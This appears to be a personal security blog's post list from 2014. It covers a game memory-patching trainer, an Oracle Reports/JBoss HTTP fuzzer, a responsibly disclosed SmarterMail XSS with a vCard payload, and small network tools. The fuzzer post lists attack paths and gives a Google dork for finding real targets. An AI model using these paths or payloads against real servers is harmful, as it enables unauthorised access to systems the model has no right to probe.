[ Game Trainer ] Assassins Creed 4 – Black Flag Stealth/Invisibilitity hack

•September 29, 2014 • Leave a Comment

Assassins-Creed-IV-Black-Flag-Logo

Here is a basic trainer for Assassins Creed 4 – Black Sails.
The game, although fun, is full of annoying sneaking missions. This trainer can assist here.
By searching for a specific array of bytes that represent a compare and a jump and replacing them with no-operation commands a sort of invisibility hack is created. By searching for an array of bytes and not relying on fixed addresses it is possible for this trainer to work on multiple versions, if not all versions.

The array of bytes to search for is: 0x80, 0x7d, 0xff, 0x00, 0x74, 0x0a, 0x5e

This should be replaced with six NOP’s.
The Address in my version of the game is 0x018a239b

Image of memory before patching:

ac4before1

Image of memory after patching:

ac4after2

I have attached source code to automatically patch it.

The trainer is designed as a launcher, and as such must be placed within the games root directory and then executed. The trainer will then launch Assassins creed, whilst searching for the relevant arrays to patch. The hack is completed once a call to WriteProcessMemory is made and six NOP’s are written to the address determined through pattern-searching.

Image of the trainer/launcher is displayed below:

launcher

[ CODE ] Trainer.c

Representing Telspace Systems at ITWeb Security Summit

•May 28, 2014 • Leave a Comment

telspaceitweb

Over the past two days (the 27th and 28th of May 2014) Telspace Systems has sponsored the ITWeb Security Summit in Sandton, South Africa.

Telspace was represented through the above stand and a slew of hard-working staff.

Booz8IVIcAAZHjL.jpg large

[ Security Tool ] Orafuzz Version 2 – HTTP Fuzzing Tool

•April 29, 2014 • Leave a Comment

orafuzz_v2_1

This application is a rewrite of my original fuzzer. Several features have been added as well as a full user-friendly GUI.

Additionally the major change in this version is the ability to modify and add the attack strings through the provided sample list. This adds to the overall flexibility of the application.

Additionally the application now supports both POST and GET requests.
The provided text file “attackstrings.txt” contains a list of attack request strings, this file must reside in the applications root directory.

This can also be used to determine whether vulnerability “CVE-2007-1036 JBoss JMX-Console Access Vulnerability” exists on a particular server.

You can try for yourself a target with google, and a google dork: inurl: /reports/rwservlet/help?

As mentioned the contents can be modified to suit the attackers needs.
The sample contents of the “attackstrings.txt” file are as below:

/reports/rwservlet
/reports/rwservlet/showenv?
/reports/rwservlet/showjobs?
/reports/rwservlet/help?
/reports/rwservlet/showmap?
/reports/rwservlet/showmyjobs?
/reports/rwservlet/showjobid?
/reports/rwservlet/killjobid?
/reports/rwservlet/parsequery?
/reports/rwservlet/showauth?
/reports/rwservlet/delauth?
/reports/rwservlet/getjobid?
/reports/rwservlet/getserverinfo?
/reports/rwservlet/killengine?
/discoverer/app
/web-console
/jmx-console

The application and code can be downloaded and viewed below:

[ .TXT C-Code ] OraFuzz_V2_GUI.c
[ .TXT C-Code ] fuzzer.c
[ .TXT C-Code ] OraFuzz_V2_GUI.h
[ .ZIP ] VS Project Files
[ .ZIP/.EXE ] Executable File
[ .TXT ] Attackstrings.txt

[XSS] Breif Security Review – Smartermail 12.0 and 5.5 Enterprise

•April 28, 2014 • Leave a Comment

SMARTERMAIL 12.0.x FREE EDITION:

Vulnerability 1:
Contact Book XSS:

It is possible to send someone a vulnerable .vcf contact file, assuming they are accessing it through Smartermail. The code is executed upon viewing the contact book.
Using the following .VCF file parameters including attack command, in javascript, alert(1):

v12_contact
The following was the result of the above XSS attack:
v12

Version 5.5 Enterprise:
The below fields can be seen below:

BEGIN:VCARD
ADR;HOME=TRUE:;;foo11;foo12;foo13;foo14;foo15
ADR;WORK=TRUE:;foo25;foo18;foo19;foo20;foo21;foo22
EMAIL;INTERNET=TRUE:alert(2)
FN:foo1 foo2 foo3 foo4
N:foo3;foo1;foo2;;foo4
NOTE:foo24
ORG:alert(6);foo17
PRODID:-//SmarterTools//SmarterMail//EN
REV:20140119T173038Z
SORT-STRING:alert(1)
TEL;ISDN=TRUE:foo10
TEL;PAGER=TRUE:foo8
TEL;CELL=TRUE;VOICE=TRUE:alert(4)
TEL;HOME=TRUE;VOICE=TRUE:foo7
TEL;WORK=TRUE;VOICE=TRUE:alert(3)
TEL;HOME=TRUE;FAX=TRUE:foo9
TEL;WORK=TRUE;FAX=TRUE:alert(5)
TITLE:foo16
URL:foo6
END:VCARD

5.5_address

The result can be seen below by visiting the contacts page, the code is executed:

5.5_address_result

The VCARDS used in these attacks can be viewed here:
[ .TXT ] VCard Version 12.0
[ .TXT ] VCard Version 5.5 Enterprise

This issue was reported to Smartertools and I am happy to report that the issues have been resolved speedily with a new build with version numbers after and including: 12.0.5197.19984

[ Code ] Enumerating Wifi access-points programatically.

•April 8, 2014 • 2 Comments

Heres some brief code that allows you to enumerate and scan for wireless ap’s in your vicinity.
The data is stored both printed on screen and stored in a log file for easy viewing.

mainprogram

logfile

 

[ .TXT ] C- Code

[ .ZIP ] Project Files

[ .ZIP ] Executable File

[ Tool Work in Progress ] WinSniff – TCP/UDP Sniffer

•March 19, 2014 • Leave a Comment

So I have been working on a packet sniffer for the past few days experimenting with winpcap.

My packet sniffer supports both UDP and TCP protocols which enumerates information such as hardware addresses, IP addresses, Ports and Data Payloads for each packet.

Tools like this can be used extensively for debugging networking applications. You will need Winpcap installed on your computer for this to work.

The below screenshot illustrates the tool in action intercepting both UDP and TCP packets.

sniffer_v2b

Before sniffing can begin you need to select the desired interface by clicking on the interface tab, this will bring up a dialog prompt as follows, and for example my input would be the numeric digit 1

sniffer_v2_interfaces

Let me know of any suggestions or help debugging it! I have had one report of it not displaying interfaces in windows 8.

But for XP and windows 7 32 and 64 bit versions it works perfectly.

[ DOWNLOAD EXTERNAL ] WINPCAP

[ .ZIP / EXE ] Program Executable

[ C Code and Tool ] Wake On LAN

•March 15, 2014 • Leave a Comment

Heres a simple Wake-on-LAN application for use in system administration.

wol_c

As the name implies it causes a correctly set-up computer to boot up remotely when instructed to do so.
This happens when the application sends a repetition of six 0xFF followed by 16 repetitions of the Targets MAC ADDRESS, represented here as AA:BB:CC:DD:EE:FF, and as is displayed in the final created packet below. The highlighted section of six 0xFF’s is known as the Magic Packet.

wol_c2

This packet is sent over UDP to the broadcast address of 255.255.255.255.

To quote wikipedia: “Wake-on-LAN support is implemented on the motherboard of a computer and the network interface (firmware), and is consequently not dependent on the operating system running on the hardware.”.

The code makes use of the winsock sendto function which enables a packet to be sent to a port/host which is not connected.

[ MSDN ] sendto function
[ .ZIP / .EXE  ] Executable files
[ .ZIP ] Project Files
[ .TXT  ] C Source Files

 
Follow

Get every new post delivered to your Inbox.